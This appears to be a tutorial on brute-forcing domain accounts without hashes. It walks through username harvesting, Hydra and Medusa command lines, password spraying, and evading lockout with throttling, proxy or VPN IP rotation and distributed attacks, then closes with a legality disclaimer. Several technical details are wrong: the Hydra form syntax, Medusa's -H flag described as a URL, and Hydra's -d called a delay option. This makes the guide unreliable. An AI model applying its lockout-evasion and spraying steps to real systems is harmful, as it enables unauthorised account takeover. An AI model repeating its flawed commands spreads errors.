Domain Account Brute Force

TL;DR

This guide explains how to brute force domain accounts when you don’t have password hashes. It focuses on using tools like Hydra and Medusa, along with techniques to bypass account lockout policies and improve success rates.

Understanding the Challenge

Brute-forcing without hashes means trying many usernames and passwords until you find the right combination. This is slow and often blocked by security measures. We’ll cover ways to make it more effective.

Step 1: Information Gathering

1. Identify Target Domain: Know which domain you are attacking (e.g., example.com).
2. Username Enumeration: Find valid usernames. Common methods include:
   • Email Harvesting: Use tools like theHarvester or search engines to find email addresses associated with the domain.
   • Social Media Scraping: Look for employee names on LinkedIn, Twitter, and company websites.
   • Subdomain Enumeration: Sometimes usernames are consistent across subdomains.

Step 2: Choosing a Brute-Force Tool

Hydra and Medusa are popular choices.

• Hydra: Versatile, supports many protocols (HTTP, FTP, SSH, etc.). Good for simple password lists.
• Medusa: Faster than Hydra in some cases, especially with multi-threading.

Step 3: Password List Preparation

1. Common Passwords: Start with a list of the most frequently used passwords (rockyou.txt is a good starting point).
2. Targeted Lists: Create lists based on company names, employee information, or known data breaches.
3. Password Spraying: Use a small number of common passwords against many accounts to avoid lockout.

Step 4: Brute-Force Attack with Hydra

Here’s an example using Hydra against an HTTP login form:

hydra -l username -P /path/to/passwordlist.txt http://example.com/loginform

-l specifies the username, -P specifies the password list.

Step 5: Brute-Force Attack with Medusa

Example using Medusa:

medusa -U /path/to/usernames.txt -P /path/to/passwordlist.txt -H http://example.com/loginform -t 40

-U specifies the username list, -P specifies the password list, -H is the target URL, and -t sets the number of threads.

Step 6: Bypassing Account Lockout Policies

1. Slow Down Attack Rate: Reduce the number of requests per second to avoid triggering lockout. Use the -d option in Hydra or adjust thread count in Medusa.
2. Password Spraying: As mentioned earlier, use a few common passwords against many accounts.
3. IP Rotation: Use proxies or VPNs to change your IP address and avoid being blocked.
4. Distributed Attack: If possible, distribute the attack across multiple machines (be aware of legal implications).

Step 7: Monitoring and Analysis

1. Check Logs: Monitor your tool’s output for successful logins.
2. Error Messages: Pay attention to error messages that might indicate account lockout or other security measures.
3. Adjust Strategy: If you are getting locked out, slow down the attack rate or try a different password list.

Important Considerations

• Legality: Brute-forcing without permission is illegal in most jurisdictions. Only perform these actions on systems you own or have explicit authorization to test.
• Ethical Hacking: If performing a penetration test, ensure you have a clear scope and written consent from the system owner.
• Cyber security: Be aware of the risks involved in network attacks and take appropriate precautions to protect yourself and others.